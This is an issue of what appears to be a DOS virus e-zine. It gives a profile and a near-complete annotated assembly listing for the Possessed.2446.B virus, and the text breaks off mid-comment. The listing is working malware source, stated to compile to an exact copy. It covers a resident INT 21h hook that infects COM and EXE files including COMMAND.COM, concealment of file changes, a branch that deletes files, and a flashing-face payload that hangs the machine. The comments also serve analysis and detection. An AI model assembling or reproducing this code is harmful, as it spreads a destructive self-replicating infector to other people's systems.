
Hexfiles Issue 2 File 009


  
HEX-FILES No. 2 File 009
════════════════════════════════════════════════════════════════════════════

Virus: Possessed.2446.B
Alias: Possessed 1.07, Possessed II
Targets: COM, EXE

Resident: Low Memory TSR
MemorySize: 2944 bytes + environment
MemorySelfRec: [0:1EC] <> 0

VirusLength: 2446 bytes
InfectiveLength:
COM: 2446 bytes
EXE: 2446 + 15 byte alignment
LocationVirusOnFile:
End of file
FileSelfRec:
COM: (File[Eof-1067..Eof-1066] = 41h 4bh) and
(File[16..81] = Virus[8..73])
EXE: File[18..19] = 70h 19h
ReadableText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"C:*.COM", "C:*.EXE" <--- drive letter varies
EncryptedText:
"POSSESSED! Bwa! ha! ha! ha! ha!$
Author: JonJon Gumba of AdU"

"COMMAND.COM"
DisplayedText:
If host program EXEC failed

"POSSESSED! Bwa! ha! ha! ha! ha!"

Payload: Flashing face
PayloadTrigger: After 11 hours if it became resident through COMMAND.COM;
After 3 or 4 hours from other programs


── POS2446B.ASM STARTS HERE ────────────────────────────────────────

;-------------------------------------------------------------------
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
; *WARNING WARNING*
; *WARNING destructive codes intentional damage WARNING*
; *WARNING deletes files WARNING*
; *WARNING WARNING*
; *WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;-------------------------------------------------------------------
; Virus: Possessed.2446.B
; Alias: Possessed 1.07, Possessed III
; Author: JonJon Gumba
; Origin: Adamson University, Manila, Philippines
;-------------------------------------------------------------------
;
; This source code is written in a way so that when compiled you will
; get an exact copy of the virus.
;
; You will only be able to duplicate the original virus if you will
; use *MASM 5.0* to compile this program listing. Other compilers or
; versions of a compiler might produce a virus different from that
; originally released.
;
; If compiled in tasm 2.01, two bytes will differ from the original
; virus, that is, from the one compiled by masm 5.0. This can also be
; compiled in a86 4.02 but you will be creating a new variant.
;
; Compile to COM.
;
;-------------------------------------------------------------------
; Program listing created by Putoksa Kawayan. HEX-FILES No. 2
;-------------------------------------------------------------------
;
; Layout of the first 24 bytes of a DOS MZ (EXE) header. The listing uses
; these names to read and patch a file's header inside the read buffer.
ExeHeader struc
isExeId dw ? ; +00h signature word; compared against 'ZM' (bytes 4Dh 5Ah on disk)
isMod dw ? ; +02h number of bytes used in the last 512-byte page
isBlocks dw ? ; +04h file size in 512-byte pages
isRelocItemCt dw ? ; +06h relocation item count (not referenced in this listing)
isHeaderSize dw ? ; +08h header size in paragraphs
isMinAlloc dw ? ; +0Ah minimum extra paragraphs (not referenced in this listing)
isMaxAlloc dw ? ; +0Ch maximum extra paragraphs (not referenced in this listing)
isSs dw ? ; +0Eh initial SS, relative to the load segment
isSp dw ? ; +10h initial SP
isCxSum dw ? ; +12h checksum word; the value 1970h here is the EXE infection marker
isIp dw ? ; +14h initial IP
isCs dw ? ; +16h initial CS, relative to the load segment
ExeHeader ends

Possessed segment 'code'
assume cs:Possessed, ds:nothing

; Offsets are 0-based rather than the usual COM 100h; the entry code
; re-bases CS by 16 paragraphs before running the main body
; (see FirstGenerationEntry).
org 0

; Fixed locations in segment 0 (the interrupt vector table area) that the
; code uses as scratch storage. A non-zero byte at 0000:01EC is the
; "already resident" marker, which makes it a useful memory indicator.
MemoryMarkerLoc equ 01ech ; residency flag (falls inside the INT 7Bh vector slot)
SaveSsOnInt21 equ 01f6h ; SS saved by UseDos (inside the INT 7Dh vector slot)
SaveSpOnInt21 equ 01f4h ; SP saved by UseDos (inside the INT 7Dh vector slot)

; Program entry point named by the END directive, i.e. the entry used when
; the assembled listing itself is run. Saves ES on the stack (popped again
; in FirstGenerationEntry), points ES at segment 0 and continues there.
PossessedEntry:
push es
xor ax,ax
mov es,ax ; ES = 0 so the residency marker can be written
jmp FirstGenerationEntry

; Plain-text identification string, 66 bytes at offset 8 of the body.
; It serves three purposes in this listing:
;  - it is copied to offset 16 of every infected COM file (see JumperSet),
;  - it is compared against offset 16 of a candidate COM file to recognise
;    an existing infection (see VerifyComInfection),
;  - its first, '$'-terminated line is printed with INT 21h/AH=09h when the
;    host program cannot be executed (see VictimExecuted).
PossessedId db 13,'POSSESSED! Bwa! ha! ha! ha! ha!$',8,32,10
db 13,'Author: JonJon Gumba of AdU',10,26

; Address installed as the INT 21h vector; it only relays to DosHandler.
isDos:
jmp DosHandler

; ---- working storage (lives inside the resident image) ----
DosVersion db ? ; major DOS version from INT 21h/AH=30h
FirstGenerationFlag db 1 ; 1 in the assembled listing; cleared in isTerminate
DosInterrupt label dword ; original INT 21h vector; also reused as a far-jump pointer
DosIntOffset dw ?
DosIntSegment dw ?
ClockInterrupt label dword ; original INT 08h (timer) vector
ClockIntOffset dw ?
ClockIntSegment dw ?
ErrorIntOffset dw ? ; original INT 24h (critical error) vector
ErrorIntSegment dw ?
VictimAsciizSegment dw ? ; far pointer to the ASCIIZ path of the file being processed
VictimAsciizOffset dw ?
Attribute dw ? ; file attributes read before they are changed
Handle dw ? ; handle of the open target file
FileTime dw ? ; original time stamp, restored in DoneWithFile
FileDate dw ? ; original date stamp, restored in DoneWithFile
ComLength dw ? ; low word of the file length (the high word is not kept)
AllocatedMemory dw ? ; segment of the DOS memory block used as file buffer
Timer dw ? ; tick counter incremented by isClock
Hour db ? ; remaining Timer wrap-arounds before the payload runs
ActivateLength db ? ; value loaded into Hour at install time: 11, 4 or 3
ViruSs dw ? ; SS:SP saved around the EXEC of the host program
ViruSp dw ?
ExeSs dw ? ; host EXE's original SS (+16), SP, CS (+16) and IP
ExeSp dw ?
ExeCs dw ?
ExeIp dw ?
ExeLengthLo dw ? ; host EXE image length from its header, rounded up to 16
ExeLengthHi dw ?
Environment dw ? ; environment segment taken from PSP:2Ch
Psp dw ? ; PSP segment of the process that installed the code

; Resident INT 21h handler. Only AX=4B00h (load and execute program) is
; intercepted; every other request goes straight to the original handler.
; On an EXEC request it processes up to two files before DOS sees the call:
;   1. the first *.COM (or, failing that, the first *.EXE) found on the
;      drive named by the first character of the program path, and
;   2. the program that is about to be executed.
; All caller registers are restored before the request is passed on.
DosHandler:
pushf
cmp ax,4b00h
jne PassToDos
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
mov bx,dx
mov bl,[bx] ; first character of the caller's path; assumed to be a drive letter (not checked)

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov ComAsciiz,bl ; patch the drive letter into both search patterns
mov ExeAsciiz,bl
mov ah,2fh ; get the caller's DTA address into ES:BX
call UseDos
push es
push bx
mov ah,1ah ; switch to a private DTA so the caller's is not disturbed
mov dx,offset VirusDta
call UseDos
mov cx,23h ; attribute mask: read-only + hidden + archive
mov dx,offset ComAsciiz
mov ah,4eh ; find first "X:*.COM"
call UseDos
jnc InfectOthersFirst
mov dx,offset ExeAsciiz
mov ah,4eh ; find first "X:*.EXE"
call UseDos
jnc InfectOthersFirst
InfectExecutingProgram:
pop dx ; restore the caller's DTA (DS:DX = saved ES:BX)
pop ds
mov ah,1ah
call UseDos
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
call SaveRegistersBeforeInfect ; process the program named in the EXEC request
jmp PassToDos
InfectOthersFirst:
mov dx,offset VirusDta
add dx,28 ; two bytes in front of the file name returned in the DTA
mov bx,dx
mov cl,ComAsciiz
mov [bx],cl ; build "X:NAME.EXT" in place
mov byte ptr [bx+1],':'
call SaveRegistersBeforeInfect ; process the file that was found (first match only)
jmp InfectExecutingProgram

; Entry to the per-file routine. In: DS:DX = ASCIIZ path of the target.
; Pushes the eight registers that RestoreRegisters later pops, then
; continues at SetInfect. Control returns to the caller through the RET in
; RestoreRegisters.
SaveRegistersBeforeInfect:
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
jmp SetInfect

assume cs:Possessed, ds:nothing

; Common exit of the per-file routine: restores the registers pushed by
; SaveRegistersBeforeInfect (in reverse order) and returns to its caller.
RestoreRegisters:
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
ret

; Restores the flags saved on entry to DosHandler and hands the request to
; the original INT 21h handler, which returns directly to the caller.
PassToDos:
popf
jmp DosInterrupt

; Records the target path and locates the start of its base name.
; In:  DS:DX = ASCIIZ path (the scan starts two bytes in, skipping "X:").
; Out: BX = offset of the first character after the last '\'
;      (or DX+2 when the path contains no '\'); falls out to
;      GotEndOfFileName when the terminating zero is reached.
SetInfect:
mov VictimAsciizSegment,ds
mov VictimAsciizOffset,dx
mov si,dx
add si,2
mov bx,si
CheckIfPathSeparator:
cmp byte ptr [si],'\'
jne CheckIfEndOfFileName
mov bx,si ; remember the position just past this separator
inc bx
jmp CheckNextCharOfFileName

CheckIfEndOfFileName:
cmp byte ptr [si],0
je GotEndOfFileName
CheckNextCharOfFileName:
inc si
jmp CheckIfPathSeparator

; Error exit used by the Relay1 chain: puts the saved INT 24h
; (critical error) vector back and leaves through RestoreRegisters.
; Note that this path does not pass through DoneWithFile, so nothing that
; DoneWithFile undoes (close, time stamp, attributes) happens here.
RestoreErrorInterrupt:
mov ax,2524h
mov dx,ErrorIntOffset
mov ds,ErrorIntSegment
call UseDos
jmp RestoreRegisters

; Prepares the target file and reads it into memory.
; Sequence of DOS calls, useful when correlating with an API trace:
;   35h/25h  INT 24h   - critical error handler replaced by isError
;   4300h              - read attributes (saved in Attribute)
;   4301h  CX=20h      - attributes forced to archive only
;   3D02h              - open read/write
;   5700h              - read date/time stamp (saved for later restore)
;   48h    BX=FFFEh    - deliberately oversized request; on failure DOS
;                        reports the largest free block in BX and the call
;                        is repeated with that size
;   4202h / 4200h      - seek to end to get the length, then back to start
;   3Fh                - read ComLength bytes to AllocatedMemory:0000
; The buffer is then classified: an 'MZ' file whose checksum word is
; already 1970h is treated as infected and released; other 'MZ' files go
; to NotInfected; everything else continues at InfectCheckCom.
GotEndOfFileName:
mov si,bx
push cs
pop es
mov di,offset NameofVictim
mov cx,13
cld
repe movsb ; keep a 13-byte copy of the base name
push ds
push dx

assume cs:Possessed, ds:Possessed

push es
pop ds
mov ax,3524h
call UseDos
mov ErrorIntSegment,es
mov ErrorIntOffset,bx
mov ax,2524h
mov dx,offset isError
call UseDos

assume cs:Possessed, ds:nothing

pop dx
pop ds
mov ax,4300h
call UseDos
Relay1:
jc RestoreErrorInterrupt
mov Attribute,cx
mov ax,4301h
mov cx,20h ; clears read-only/hidden/system so the file can be opened for writing
call UseDos
jc Relay1
mov ax,3d02h
call UseDos
jc Relay1
mov Handle,ax
mov bx,ax
mov ax,5700h
call UseDos
mov FileDate,dx
mov FileTime,cx
mov bx,-2
mov ah,48h
call UseDos
jnc EnoughMemory
mov ah,48h ; retry with BX = largest available block as reported by DOS
call UseDos
jc Relay1
EnoughMemory:
mov AllocatedMemory,ax
xor cx,cx
mov dx,cx
mov bx,Handle
mov ax,4202h
call UseDos
jc Relay2
mov ComLength,ax ; only the low word of the length is stored
call MovePointerBegin
Relay2:
jc Relay3
mov cx,ComLength
xor dx,dx
mov ds,AllocatedMemory
mov ah,3fh
call UseDos
Relay3:
jc DoneWithFile
push cs
pop es
xor si,si
cmp word ptr [si],'ZM'
jne InfectCheckCom
cmp word ptr [si].isCxSum,1970h ; EXE self-recognition: header bytes 18..19 = 70h 19h
je DoneWithFile
jmp NotInfected

; COM self-recognition, in two steps:
;   1. the word at (length - (VirusStack - FaceData)) must be 4B41h,
;      i.e. the bytes 41h 4Bh that open FaceData;
;   2. the 66 bytes at file offset 16 must equal PossessedId.
; Both true  -> already infected, the file is released untouched.
; Step 1 only -> the file is DELETED (DeleteFile). This is the destructive
;               branch the warning banner at the top of the listing refers
;               to: any non-EXE file that happens to carry 41h 4Bh at that
;               position without the ID string at offset 16 is removed.
; Step 1 false, or file shorter than the offset -> NotInfected.
InfectCheckCom:
mov si,cx ; CX still holds the requested read length (ComLength)
sub si,(offset VirusStack-offset FaceData)
js Relay4
cmp word ptr [si],4b41h
je VerifyComInfection
Relay4:
jmp NotInfected

VerifyComInfection:
mov si,16
mov di,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe cmpsw
je DoneWithFile
jmp DeleteFile

assume cs:Possessed, ds:Possessed

; Common clean-up once a file has been opened: frees the read buffer,
; restores the original date/time stamp, closes the handle and restores the
; original attributes. Because time stamp and attributes are put back, those
; fields alone do not reveal that a file was modified.
; This exit goes straight to RestoreRegisters; it does not pass through
; RestoreErrorInterrupt, so the INT 24h vector set in GotEndOfFileName is
; not put back on this path.
DoneWithFile:
push cs
pop ds
mov es,AllocatedMemory
mov ah,49h ; free the buffer
call UseDos
mov bx,Handle
mov dx,FileDate
mov cx,FileTime
mov ax,5701h ; restore date/time stamp
call UseDos
mov ah,3eh ; close
call UseDos
mov ds,VictimAsciizSegment

assume cs:Possessed, ds:nothing

mov dx,VictimAsciizOffset
mov cx,Attribute
mov ax,4301h ; restore original attributes
call UseDos
jmp RestoreRegisters

; Decides whether and how an uninfected file is processed.
;  - DL = drive number for the free-space query, derived from the first
;    character of the path (assumes an upper-case drive letter).
;  - ActivateLength is updated: it becomes 3 if it was 4, otherwise 4.
;  - The stored, encoded name "COMMAND.COM" is decoded in place, compared
;    with the 11-byte base name of the target, and encoded again.
;  - If the target is COMMAND.COM: on DOS 3 or later ActivateLength is set
;    to 11 and the free-space check is skipped; on older DOS the file is
;    released without being modified.
;  - Any other file continues at CheckDiskSpace.
NotInfected:
push es
mov ds,VictimAsciizSegment
mov si,VictimAsciizOffset
mov dl,[si]
sub dl,'A'-1

assume cs:Possessed, ds:Possessed

pop ds
mov al,4
cmp ActivateLength,11
je SetActivateTime
cmp ActivateLength,al
jne SetActivateTime
mov al,3
SetActivateTime:
mov ActivateLength,al
mov si,offset EncryptedCommandCom
mov cx,11
mov al,17h
call Scrambler ; decode: subtract 17h from each byte
mov di,offset NameofVictim
call Compare ; CF set = names differ
pushf
neg al
call Scrambler ; subtracting -17h re-encodes the string in memory
popf
jc CheckDiskSpace
cmp DosVersion,3
jnc SetActivateFromCommand
Relay5:
jmp DoneWithFile
SetActivateFromCommand:
mov ActivateLength,11
jmp EnoughDiskSpace

assume cs:Possessed, ds:nothing

; Free-space gate followed by the COM/EXE dispatch.
; INT 21h/AH=36h returns sectors-per-cluster in AX, free clusters in BX and
; bytes-per-sector in CX. The two MULs compute AX*BX and then multiply only
; the low word of that product by CX, so the result is an approximation of
; the free byte count. The file is released if the result is below 2500.
CheckDiskSpace:
mov ah,36h
call UseDos
xor dx,dx
mul bx
mul cx
or dx,dx
jne EnoughDiskSpace
cmp ax,2500
jc Relay5
EnoughDiskSpace:
mov bx,Handle
call MovePointerBegin
jc Relay5
mov ds,AllocatedMemory
xor si,si
cmp word ptr [si],'ZM' ; header signature decides the file type, not the extension
jne isComFile
jmp isExeFile

; 16-byte stub that replaces the first bytes of an infected COM file
; (copied to buffer offset 0 in JumperSet). At run time it loads BX and SI
; from the two words that follow it (addresses 10Ch and 10Eh in the loaded
; image) and jumps to BX. In the accompanying debug script the code part
; appears as 2E 8B 1E 0C 01 2E 8B 36 0E 01 FF E3; an infected COM file
; therefore starts with these 12 bytes, two pointer words, and then the
; PossessedId text at offset 16.
Jumper:
mov bx,cs:[100h+(LocComEntry-Jumper)]
mov si,cs:[100h+(LocEndOfFile-Jumper)]
jmp bx

LocComEntry dw ? ; run-time address of ComEntry inside the infected file
LocEndOfFile dw ? ; value handed to ComEntry in SI (see isComFile for how it is set)

; COM infection path. In: DS = buffer holding the whole file, SI = 0,
; BX = Handle, ES = CS.
;  1. The first 90 bytes of the host are saved in SaveVictimCode.
;  2. LocComEntry / LocEndOfFile are computed for the stub.
;     - Ordinary file: the body is appended, so both are based on
;       ComLength plus an offset inside the body.
;     - COMMAND.COM (ActivateLength = 11): the entry address is placed
;       inside the last (offset VirusStack) bytes of the existing file.
;  3. The first 82 bytes of the buffer are replaced by the Jumper stub
;     (16 bytes) and PossessedId (66 bytes).
;  4. The buffer is written back from offset 0, followed by the body.
;     For COMMAND.COM only ComLength - (offset VirusStack) host bytes are
;     written, so the body overwrites the tail of the file and the file
;     length stays the same; for other files the length grows by
;     offset VirusStack bytes.
isComFile:
push ds
push ds
mov di,offset SaveVictimCode
mov cx,(offset VirusStack-offset SaveVictimCode)/2
cld
repe movsw ; buffer[0..89] -> SaveVictimCode
pop es

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ComLength
cmp ActivateLength,11
jne ComNotCommand
mov LocEndOfFile,dx
sub dx,-((ComEntry-VirusStack)+100h) ;ffa3
mov LocComEntry,dx
jmp JumperSet

ComNotCommand:
push dx
add dx,offset ComEntry+100h
mov LocComEntry,dx
pop dx
add dx,offset VirusStack
mov LocEndOfFile,dx
JumperSet:
mov si,offset Jumper
xor di,di
mov cx,(isComFile-Jumper)/2
cld
repe movsw ; stub -> buffer[0..15]
mov si,offset PossessedId
mov cx,(isDos-PossessedId)/2
cld
repe movsw ; ID text -> buffer[16..81]
call MovePointerBegin

assume cs:Possessed, ds:nothing

pop ds
mov cx,ComLength
cmp ActivateLength,11
jne NotCommandCom
sub cx,offset VirusStack ; COMMAND.COM: stop short so the body lands on the file's tail
NotCommandCom:
xor dx,dx
mov ah,40h ; write the modified host image
call UseDos
jnc WriteOk
Relay6:
jmp Relay5

WriteOk:
push cs
pop ds
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h ; write the body (offset 0 up to VirusStack)
call UseDos
jc Relay6
jmp DoneWithFile

; Destructive branch reached only from VerifyComInfection: deletes the
; target file by path (INT 21h/AH=41h) and then runs the normal clean-up.
; The delete is issued while the handle opened earlier is still open; the
; close happens afterwards in DoneWithFile.
DeleteFile:
mov ds,VictimAsciizSegment
mov dx,VictimAsciizOffset
mov ah,41h
call UseDos
jmp DoneWithFile

; Scratch words used by the payload, addressed at fixed offsets derived
; from the Environment and Psp variables (+100h).
PixelRow equ Environment+100h
PixelColumn equ Psp+100h

; Resident INT 08h (timer tick) handler and payload trigger.
; Timer is incremented on every tick; each time it wraps to zero Hour is
; decremented, and when Hour reaches zero the payload starts. With the
; standard PC tick rate of about 18.2 Hz one wrap of a 16-bit counter is
; roughly an hour, which matches the hour-based trigger in the profile.
; All other ticks are chained to the original handler.
isClock:
pushf
inc Timer
jne NotYetTime
dec Hour
je ShowTime
NotYetTime:
popf
jmp ClockInterrupt

; Payload. Switches the display to video mode 6 through INT 10h and then
; loops forever drawing and erasing the FaceData figure at five positions.
; The loop never returns to the interrupted program (LoadFaceData ends with
; an unconditional jump to itself), so the machine stays in the animation
; until it is restarted.
ShowTime:
popf
mov ax,6 ; INT 10h/AH=00h, AL=06h: set video mode 6
int 10h

assume cs:Possessed, ds:Possessed

push cs
pop ds
xor bx,bx
xor dx,dx
LoadFaceData:
mov si,offset FaceData
mov word ptr PixelRow,200
mov word ptr PixelColumn,0
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,201
mov word ptr PixelColumn,-1
call ShowPayload
mov word ptr PixelRow,189
mov word ptr PixelColumn,1
call ShowPayload
jmp LoadFaceData
; Draws the figure once with colour 1 and then again with colour 0, which
; produces the flashing effect. In: SI = FaceData, a list of byte pairs
; ended by a zero byte. For each pair the first byte plus PixelRow goes to
; CX and the second byte plus PixelColumn goes to DX before INT 10h/AH=0Ch
; (write pixel) is called. Note that INT 10h/AH=0Ch takes the column in CX
; and the row in DX, so the variable names are the reverse of that usage.
ShowPayload:
push si
mov al,1
mov cx,2
EraseFace:
push cx
push si
SetNextCoordinate:
mov bl,[si]
or bl,bl
je EndFaceData
mov cx,bx
add cx,PixelRow
mov dl,[si+1]
add dx,PixelColumn
mov ah,0ch
int 10h
add si,2
jmp SetNextCoordinate

EndFaceData:
pop si
xor al,al ; second pass uses colour 0 (erase)
pop cx
loop EraseFace
pop si
ret

assume cs:Possessed, ds:nothing

; EXE infection path. In: DS = buffer holding the file, SI = 0, BX = Handle.
;  1. The checksum word is set to 1970h (the EXE infection marker).
;  2. The host's SS (+16), SP, IP and CS (+16) are saved in the body so the
;     host can be started later (see ExecuteExeVictim).
;  3. The image length is taken from the header (pages * 512, corrected by
;     the last-page byte count) and rounded up to a paragraph; this is the
;     "+ 15 byte alignment" in the profile. The body is written at that
;     offset, not at the actual end of file, so any data stored after the
;     header-described image would be overwritten - TODO confirm against a
;     sample with overlay data.
;  4. Page count and last-page size are recomputed for the new length, and
;     CS:IP / SS:SP are pointed at ExeEntry+100h / VirusStack+100h in a
;     segment 16 paragraphs below the body.
;  5. The first 28 bytes of the buffer are written back as the new header,
;     then the body is written at the rounded length.
isExeFile:
mov word ptr [si].isCxSum,1970h
mov ax,[si].isSs
add ax,16
mov ExeSs,ax
mov ax,[si].isSp
mov ExeSp,ax
mov ax,[si].isIp
mov ExeIp,ax
mov ax,[si].isCs
add ax,16
mov ExeCs,ax
mov ax,[si].isBlocks
cmp word ptr [si].isMod,0
je PageAligned
dec ax ; last page is partial: count only the full pages
PageAligned:
mov bx,512
mul bx
add ax,[si].isMod
adc dx,0
add ax,15
adc dx,0
and ax,0fff0h ; round up to a 16-byte boundary
mov ExeLengthLo,ax
mov ExeLengthHi,dx
add ax,offset VirusStack
adc dx,0
jc Relay7 ; give up if the 32-bit length overflows
div bx
or dx,dx
je AlignedToPage
inc ax
AlignedToPage:
mov [si].isBlocks,ax
mov [si].isMod,dx
mov ax,ExeLengthLo
mov dx,ExeLengthHi
mov bx,16
div bx
sub ax,[si].isHeaderSize
sub ax,16
mov [si].isCs,ax
mov word ptr [si].isIp,offset ExeEntry+100h
mov [si].isSs,ax
mov word ptr [si].isSp,offset VirusStack+100h
mov bx,Handle
call MovePointerBegin
mov cx,28
xor dx,dx
mov ah,40h ; write the patched header
call UseDos

assume cs:Possessed, ds:Possessed

push cs
pop ds
mov dx,ExeLengthLo
mov cx,ExeLengthHi
mov ax,4200h ; seek to the rounded image length
call UseDos
mov dx,offset PossessedEntry
mov cx,offset VirusStack
mov ah,40h ; write the body
call UseDos
Relay7:
jmp DoneWithFile

assume cs:Possessed, ds:nothing

; Replacement INT 24h (critical error) handler installed while a file is
; being processed. Instead of returning to DOS it reloads the SS:SP that
; UseDos stored at 0000:01F4/01F6, pops the three registers UseDos had
; pushed at that point (AX, ES, BP) and returns to UseDos's caller with the
; carry flag set. The effect is that a critical error (for example a
; write-protected disk) makes the pending DOS call look like an ordinary
; failed call and no "Abort, Retry" prompt is shown.
isError:
xor ax,ax
mov es,ax
mov ss,es:SaveSsOnInt21
mov sp,es:SaveSpOnInt21
pop ax
pop es
pop bp
stc
ret

; Calls the original INT 21h handler directly (PUSHF + far CALL through the
; saved vector) so the request does not pass through the resident hook.
; Before the call, SS:SP is stored at 0000:01F4/01F6 - taken after BP, ES
; and AX have been pushed - so that isError can unwind to the caller.
; In/Out: registers as required by the DOS function requested in AH/AX.
; BP is preserved; flags are returned as DOS left them.
UseDos:
push bp
push es
push ax
xor ax,ax
mov es,ax
mov es:SaveSpOnInt21,sp
mov es:SaveSsOnInt21,ss
pop ax
pop es
pushf
call DosInterrupt
pop bp
ret

; Moves the file pointer to the start of the file (INT 21h/AX=4200h with
; offset CX:DX = 0). In: BX = file handle, set by the caller.
; Out: carry flag as returned by DOS. Changes AX, CX, DX.
MovePointerBegin:
xor cx,cx
mov dx,cx
mov ax,4200h
call UseDos
ret

; Byte-wise subtractive encoder/decoder.
; In: DS:SI = buffer, CX = byte count, AL = key.
; Subtracts AL from every byte in place. Calling it with the key decodes
; the stored strings; calling it again with the negated key restores the
; encoded form. CX and SI are preserved; flags are changed.
Scrambler:
push cx
push si
Masker:
sub [si],al
inc si
loop Masker
pop si
pop cx
ret

; Compares CX bytes at DS:SI with CX bytes at ES:DI.
; Out: carry clear if all bytes match, carry set otherwise.
; SI and CX are preserved; DI is not.
Compare:
push si
push cx
cld
repe cmpsb
je MatchFound
stc
MatchFound:
pop cx
pop si
ret

; "COMMAND.COM" stored with 17h added to every byte. It is decoded only for
; the duration of the name comparison in NotInfected, so a plain-text search
; of an infected file or of memory will normally not find this string.
EncryptedCommandCom db 'C'+17h,'O'+17h,'M'+17h,'M'+17h,'A'+17h
db 'N'+17h,'D'+17h,'.'+17h,'C'+17h,'O'+17h
db 'M'+17h

; Copy of the PossessedId text with 25h added to every byte (66 bytes).
; SetUpPossessed decodes it, copies it over the plain-text PossessedId and
; encodes it again, so the visible ID is rewritten from this copy each time
; the code installs itself.
EncryptedPossessedId db 13+25h,'P'+25h,'O'+25h,'S'+25h,'S'+25h
db 'E'+25h,'S'+25h,'S'+25h,'E'+25h,'D'+25h
db '!'+25h,' '+25h,'B'+25h,'w'+25h,'a'+25h
db '!'+25h,' '+25h,'h'+25h,'a'+25h,'!'+25h
db ' '+25h,'h'+25h,'a'+25h,'!'+25h,' '+25h
db 'h'+25h,'a'+25h,'!'+25h,' '+25h,'h'+25h
db 'a'+25h,'!'+25h,'$'+25h,8+25h,32+25h,10+25h
db 13+25h,'A'+25h,'u'+25h,'t'+25h,'h'+25h
db 'o'+25h,'r'+25h,':'+25h,' '+25h,'J'+25h
db 'o'+25h,'n'+25h,'J'+25h,'o'+25h,'n'+25h
db ' '+25h,'G'+25h,'u'+25h,'m'+25h,'b'+25h
db 'a'+25h,' '+25h,'o'+25h,'f'+25h,' '+25h
db 'A'+25h,'d'+25h,'U'+25h,10+25h,26+25h

;----------------------------
;--------------Possessed payload data
;----------------------------
; Coordinate list for the payload figure: byte pairs read by ShowPayload,
; terminated by a single zero byte. The first pair, 41h 4Bh, doubles as the
; COM self-recognition marker: InfectCheckCom looks for the word 4B41h at
; (file length - (VirusStack - FaceData)), which is the "Eof-1067" position
; given in the profile at the top of the page.
FaceData label byte
db 41h,4bh,42h,4bh,42h,4ch,43h,4ch,44h,4ch,45h,4ch,43h,4dh,46h
db 4dh,47h,4dh,44h,4eh,48h,4eh,49h,4eh,4ah,4eh,45h,4fh,4bh,4fh
db 4ch,4fh,0b6h,4ah,0b5h,4ah,0b5h,4bh,0b4h,4bh,0b3h,4bh,0b2h,4bh,0b4h
db 4ch,0b1h,4ch,0b0h,4ch,0b3h,4dh,0afh,4dh,0aeh,4dh,0adh,4dh,0b2h,4eh
db 0ach,4eh,0abh,4eh,4ch,54h,4ch,55h,4dh,55h,4eh,55h,4fh,56h,50h
db 56h,51h,56h,52h,56h,53h,56h,54h,57h,55h,57h,56h,57h,57h,57h
db 58h,57h,59h,58h,5ah,58h,5bh,58h,5ch,58h,5dh,58h,5ah,59h,5bh
db 59h,5ch,59h,5dh,59h,60h,59h,5fh,59h,60h,59h,61h,59h,62h,59h
db 5bh,5ah,5ch,5ah,63h,5ah,64h,5ah,65h,5ah,66h,5ah,67h,5ah,5ch
db 5bh,68h,5bh,69h,5bh,6ah,5bh,6bh,5bh,6ch,5bh,6dh,5ch,6eh,5ch
db 6fh,5ch,70h,5dh,0b1h,53h,0b0h,54h,0afh,54h,0aeh,54h,0adh,55h,0ach
db 55h,0abh,55h,0aah,55h,0a9h,55h,0a8h,55h,0a7h,56h,0a6h,56h,0a5h,56h
db 0a4h,56h,0a3h,56h,0a2h,57h,0a1h,57h,0a0h,57h,9fh,57h,9eh,57h,9dh
db 57h,9ch,58h,9bh,58h,9ah,58h,99h,58h,98h,58h,9ah,59h,99h,59h
db 98h,59h,97h,59h,96h,59h,95h,59h,94h,59h,93h,59h,92h,59h,99h
db 5ah,98h,5ah,91h,5ah,90h,5ah,8fh,5ah,8eh,5ah,8dh,5ah,98h,5bh
db 8ch,5bh,8bh,5bh,8ah,5bh,89h,5bh,88h,5bh,87h,5bh,86h,5ch,85h
db 5ch,84h,5ch,83h,5ch,76h,63h,75h,64h,75h,65h,74h,66h,74h,67h
db 73h,68h,73h,69h,72h,6ah,71h,6bh,71h,6ch,70h,6dh,70h,6eh,6fh
db 6fh,6eh,70h,6eh,71h,7bh,71h,6dh,72h,7ah,72h,79h,72h,6dh,73h
db 78h,73h,77h,73h,76h,73h,75h,73h,6ch,74h,71h,74h,72h,74h,73h
db 74h,74h,74h,6ch,75h,6dh,75h,6eh,75h,6fh,75h,70h,75h,6bh,76h
db 6ch,76h,6dh,81h,6eh,81h,6fh,81h,70h,80h,71h,80h,72h,80h,73h
db 80h,74h,7fh,75h,7fh,76h,7fh,77h,7fh,78h,7eh,79h,7eh,7ah,7eh
db 7bh,7eh,7ch,7dh,7dh,7dh,7eh,7dh,7fh,7dh,80h,7dh,81h,7ch,82h
db 7ch,83h,7ch,84h,7ch,85h,7bh,86h,7bh,87h,7bh,88h,7bh,89h,7ah
db 8ah,7ah,8bh,7ah,8ch,7ah,8dh,79h,8eh,79h,8fh,79h,90h,79h,91h
db 78h,92h,78h,93h,78h,94h,77h,95h,77h,96h,76h,97h,76h,98h,75h,0

; Find-first patterns used by DosHandler. The leading 'C' is only a
; placeholder: the first byte of each pattern is overwritten at run time
; with the first character of the path in the intercepted EXEC request.
; No directory is given, so the search applies to the current directory of
; that drive.
ComAsciiz db 'C:*.COM',0
ExeAsciiz db 'C:*.EXE',0

; Entry point of an infected EXE file (the patched header sets IP to
; ExeEntry+100h, which is why variables are addressed with +100h here).
; Tests the residency marker at 0000:01EC:
;   marker set   -> ExecuteExeVictim: start the host immediately;
;   marker clear -> continue at ExeNotInMemory with SI = 100h to install.
; The first word of this routine (bytes 06h 33h) is also read as data by
; SetUpPossessed.
ExeEntry:
push es
xor ax,ax
mov es,ax
cmp byte ptr es:MemoryMarkerLoc,0
jne ExecuteExeVictim
mov si,100h
jmp ExeNotInMemory

; Rebuilds the host's original SS:SP and CS:IP from the values saved at
; infection time, relocated by the PSP segment that was pushed on entry,
